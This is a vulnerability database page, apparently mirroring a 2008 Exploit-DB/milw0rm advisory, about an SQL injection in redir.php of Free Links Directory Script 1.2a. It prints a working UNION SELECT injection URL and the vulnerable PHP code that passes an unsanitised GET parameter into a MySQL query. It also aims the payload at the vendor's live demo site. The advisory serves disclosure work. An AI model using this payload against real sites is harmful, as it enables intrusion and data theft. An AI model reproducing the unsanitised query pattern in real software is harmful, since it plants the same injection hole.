Lucene search
+L

FLDS 1.2a - 'redir.php' SQL Injection

🗓️ 14 Dec 2008 00:00:00Reported by nuclearType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 2600 Views

FLDS 1.2a - 'redir.php' SQL Injection Vulnerability on Free Links Directory Scrip

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-5778
14 Dec 200800:00
circl
circl
Circl
CVE-2008-5779
14 Dec 200800:00
circl
circl
Circl
CVE-2008-5928
14 Dec 200800:00
circl
cve
CVE
CVE-2008-5778
30 Dec 200820:00
cve
cve
CVE
CVE-2008-5779
30 Dec 200820:00
cve
cve
CVE
CVE-2008-5928
21 Jan 200918:00
cve
cvelist
Cvelist
CVE-2008-5778
30 Dec 200820:00
cvelist
cvelist
Cvelist
CVE-2008-5779
30 Dec 200820:00
cvelist
cvelist
Cvelist
CVE-2008-5928
21 Jan 200918:00
cvelist
exploitdb
Exploit DB
FLDS 1.2a - 'lpro.php' SQL Injection
15 Dec 200800:00
exploitdb
Rows per page
#Free Links Directory Script (id) SQL Injection Vulnerability


#Author: nuclear


#site:
http://flds-script.com


#vuln:
http://localhost/[path]/redir.php?id=-1%20UNION%20SELECT%201,2,@@version,4,5,6,7,8,9,10,11/*


#vulnerable code:
$ida = $_GET['id'];
$link = mysql_fetch_array(mysql_query("select * from links where id=$ida"));
$idcheck = mysql_numrows(mysql_query("select * from links where id=$ida"));


#demo:
http://flds-script.com/demo/redir.php?id=-1 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11

#notes:
the injection does not work if trying to comment out the rest of the query.The result page will be a 404 but
you can get the data of the injection in the url


#greetz Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, Whitestar

# milw0rm.com [2008-12-14]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation